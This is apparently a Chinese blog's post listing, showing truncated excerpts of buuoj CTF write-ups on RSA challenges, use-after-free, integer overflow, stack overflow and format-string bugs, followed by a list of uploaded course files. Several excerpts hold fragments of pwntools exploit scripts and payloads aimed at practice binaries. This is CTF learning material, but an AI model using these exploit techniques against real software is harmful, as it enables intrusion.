- 博客(10)
- 资源 (12)
- 收藏
- 关注
原创 buuoj INSHack2019 Yet Another RSA Challenge - Part 1
题目:import subprocessp = subprocess.check_output('openssl prime -generate -bits 2048 -hex')q = subprocess.check_output('openssl prime -generate -bits 2048 -hex')flag = int('INSA{REDACTED}'.encode('...
2020-03-31 12:23:18 361
原创 buuoj BJDCTF 2nd ydsneedgirlfriend2
free代码,free以后未置空指针unsigned __int64 dele(){…… free(*(void **)girlfriends[v1]); free((void *)girlfriends[v1]); ……}可以再次利用from pwn import *#sh = process('./ydsneedgirlfriend2')def ad...
2020-03-30 22:36:08 339
原创 buuoj BJDCTF 2nd r2t3
buf定义长度为0x400。而buf的长度为0x408所以不存在溢出。可见name_check函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3定义的数据类型实际为unsigned char。仅有1个字节,超过1个字节数据丢弃,也就是最大数值为0xff ,也就是0x100=256=0,那么可以用0x104至0x107来满足上面的条件。即为传说中的整形溢出...
2020-03-26 22:31:28 707
原创 buuoj jarvisoj_test_your_memory
存在溢出漏洞:进行了逻辑判断,相等则输出good job!!!从堆栈上看,s2在return地址下面。整合上面,便于脚本如下:from pwn import*p = process('./memory')system_addr = 0x08048440catflag_addr = 0x080487E0payload='A'*0x17 + p32(system_addr...
2020-03-26 21:39:30 296
原创 buuoj jarvisoj_tell_me_something
main函数:int __cdecl main(int argc, const char **argv, const char **envp){ __int64 v4; // [rsp+0h] [rbp-88h] write(1, "Input your message:\n", 0x14uLL); read(0, &v4, 0x100uLL); return wri...
2020-03-26 09:29:54 177
原创 buuoj BJDCTF 2nd rsa1
e=12563813p2+q2=212364140166849615900345386827373855409339975015067104662427876599237913584644325298351035312142873679076322952156014899039684112869213110216339149927308917382659025088961162906104834...
2020-03-26 00:16:01 1014
原创 buuoj BJDCTF 2nd one_gadget
程序输出printf函数地址可以利用工具one_gadget计算libc基址from pwn import *#p = process('./one_gadget')p = remote("node3.buuoj.cn",26742)out = p.recv()addr = int(out[out.find('0x')+2:out.find('0x')+14],16)...
2020-03-25 23:59:30 622
原创 buuctf 相册
邮件信息是通过NativeMethod调用而NativeMethod在java里面通常用于调用外部非java的程序。Java有能力调用其他语言编写的函数or方法,这个通过JNI(Java Native Interfface)实现。使用时,通过native关键字告诉JVM这个方法是在外部定义的。查看资源里面有libcore.so文件,查找字符串发现有base64编码字符解码可得1...
2020-03-21 00:15:38 1085
原创 buuctf jarvisoj_fm
存在格式化字符串漏洞而实际上x的值为3需要通过格式化字符串漏洞来重写x的值使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n,意思将0x0804A02C的x地址写入32位大小的一个...
2020-03-19 23:10:46 305
原创 buuctf findit
核心代码: protected void onCreate(Bundle arg8) { super.onCreate(arg8); this.setContentView(0x7F030018); this.findViewById(0x7F05003D).setOnClickListener(new View$OnClickListen...
2020-03-19 22:49:15 262
redflag Linux试卷
2009-06-24
图像处理与VC6技术内幕
2009-06-24
优化理论研究生课程设计
2009-06-24
研究生神经网络课程设计
2009-06-24
基于模式识别的水果智能分类系统
2009-02-16
LPC2300系列ARM多媒体课件3
2009-02-16
LPC2300系列ARM多媒体课件2
2009-02-16
LPC2300系列ARM多媒体课件1
2009-02-16
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人